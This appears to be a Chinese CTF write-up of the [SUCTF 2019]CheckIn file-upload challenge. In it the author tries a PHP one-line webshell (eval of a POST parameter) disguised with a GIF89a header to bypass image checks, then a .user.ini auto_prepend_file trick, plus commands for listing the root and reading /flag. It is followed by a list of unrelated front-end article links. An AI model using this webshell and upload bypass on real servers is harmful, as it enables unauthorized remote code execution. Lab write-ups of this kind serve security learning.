练习 9 Web [SUCTF 2019]CheckIn (未拿到flag)

上传图片格式的木马文件:

返回 <? in contents!,存在PHP代码检测

上传非图片格式文件:

返回 不允许非image

修改木马PHP代码规避检测

php 复制代码
<? ?> 改为 < script language="php">< /script >

<?php @eval($_POST['shell']);?> 

<script language='php'>@eval($_POST['shell']);</script>

上传强行加上gif文件头的GIF图片木马

php 复制代码
GIF89a?<script language='php'>@eval($_POST['shell']);</script>

返回如下内容:上传文件位置

现在传上去,因为还是图片格式文件,没有办法执行

尝试在"练习5"中提到的.htaccess文件,发现也被过滤了

卡住,搜索其他wp

新内容:user.ini文件
[SUCTF 2019]CheckIn 1
user.ini文件构成的PHP后门
BUUCTF | [SUCTF 2019]CheckIn

因为本题过滤非图片格式,所以必须加上前面的"GIF89a"

php 复制代码
GIF89a                  //绕过exif_imagetype()
auto_prepend_file=a.jpg //指定在主文件之前自动解析的文件的名称,并包含该文件,就像使用require函数调用它一样。
auto_append_file=a.jpg  //解析后进行包含

uploads/18de044ce1c88142786756f6f8015474/index.php

cmd=var_dump(scandir("/"));

cmd=var_dump(file_get_contents("/flag"));

但最后始终刷不出来,不知道什么情况,蚁剑也死活连不上

相关推荐
YAY_tyy7 分钟前
基于 Vue3 + VueOffice 的多格式文档预览组件实现(支持 PDF/Word/Excel/PPT)
前端·javascript·vue.js·pdf·word·excel
Yvonne爱编码27 分钟前
AJAX入门-AJAX 概念和 axios 使用
前端·javascript·ajax·html·js
在路上`43 分钟前
前端学习之后端java小白(三)-sql外键约束一对多
java·前端·学习
Pu_Nine_91 小时前
10 分钟上手 ECharts:从“能跑”到“生产级”的完整踩坑之旅
前端·javascript·echarts·css3·html5
東雪蓮☆2 小时前
从零开始掌握 Web 与 Nginx:入门详解
运维·服务器·前端·nginx
脑子慢且灵2 小时前
【JavaWeb】一个简单的Web浏览服务程序
java·前端·后端·servlet·tomcat·web·javaee
柯南二号2 小时前
【大前端】 断点续传 + 分片上传(大文件上传优化) 的前端示例
前端
前端小超超3 小时前
如何配置capacitor 打包的安卓app固定竖屏展示?
android·前端·gitee
xiaopengbc3 小时前
在Webpack中,如何在不同环境中使用不同的API地址?
前端·webpack·node.js
前端AK君3 小时前
React中台系统如何嵌入到业务系统中
前端